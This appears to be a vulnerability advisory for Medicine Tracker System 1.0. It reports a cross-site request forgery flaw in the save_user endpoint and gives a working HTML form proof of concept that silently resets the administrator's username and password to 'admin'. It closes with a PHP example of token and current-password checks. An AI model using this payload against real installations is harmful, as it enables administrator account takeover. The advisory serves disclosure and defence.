CSRF2.md

File metadata and controls

53 lines (36 loc) · 1.78 KB

Affected version:

Medicine Tracker System - 1.0

Vendor:

https://www.sourcecodester.com/users/tips23

Software:

https://www.sourcecodester.com/php/16308/medicine-tracker-system-php-oop-and-mysql-db-source-code-free-download.html

Vulnerability File:

/php-mts/classes/Users.php?f=save_user

Description:

Medicine Tracker System has a CSRF vulnerability in its password-change function. An attacker can trick the administrator into changing the administrator login password, which leads to system information being leaked.

Status: CRITICAL

POC

Create a CSRF PoC for the password-change request:

```html
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/php-mts/classes/Users.php?f=save_user" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="id" value="1" />
      <input type="hidden" name="firstname" value="123" />
      <input type="hidden" name="middlename" value="123" />
      <input type="hidden" name="lastname" value="123" />
      <input type="hidden" name="username" value="admin" />
      <input type="hidden" name="password" value="admin" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```

When the administrator clicks the button, the password is changed successfully.

Code analysis

The password is changed here without verifying the original password and without a random verification code in the request, which makes the CSRF possible.
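The two missing checks named above, written as an added example (not code from Medicine Tracker System). The function names, the `csrf_token` and `current_password` fields, and the use of `password_hash()` for the stored password are assumptions made for illustration.

```php
<?php
// Added example: hypothetical guard for a save_user-style handler.
// Names and fields below are assumptions, not the project's own code.

// Issue one random token per session; the profile form embeds it in a hidden field.
function csrf_token(array &$session): string {
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Returns null when the request may proceed, otherwise the reason for rejecting it.
function check_password_change(array $post, array $session, string $storedHash): ?string {
    $sent     = $post['csrf_token'] ?? '';
    $expected = $session['csrf_token'] ?? '';
    // Constant-time comparison; a session without a token never matches.
    if (!is_string($sent) || $expected === '' || !hash_equals($expected, $sent)) {
        return 'CSRF token missing or invalid';
    }
    // Require the current password only when the request sets a new one.
    if (($post['password'] ?? '') !== '') {
        $current = $post['current_password'] ?? '';
        if (!is_string($current) || !password_verify($current, $storedHash)) {
            return 'current password incorrect';
        }
    }
    return null;
}

// Constructed sample data: a logged-in session and a stored password hash.
$session    = [];
$token      = csrf_token($session);
$storedHash = password_hash('old-secret', PASSWORD_DEFAULT);

// The cross-site form from the PoC sends these six fields and nothing else.
$forged = ['id' => '1', 'firstname' => '123', 'middlename' => '123',
           'lastname' => '123', 'username' => 'admin', 'password' => 'admin'];
// The application's own form adds the session token and the current password.
$legit = $forged + ['csrf_token' => $token, 'current_password' => 'old-secret'];

foreach (['forged' => $forged, 'legit' => $legit] as $label => $request) {
    $error = check_password_change($request, $session, $storedHash);
    echo $label, ': ', $error === null ? 'accepted' : "rejected ($error)", PHP_EOL;
}
```

In a real handler `$session` would be `$_SESSION` and `$post` would be `$_POST`, with the check run before any database update.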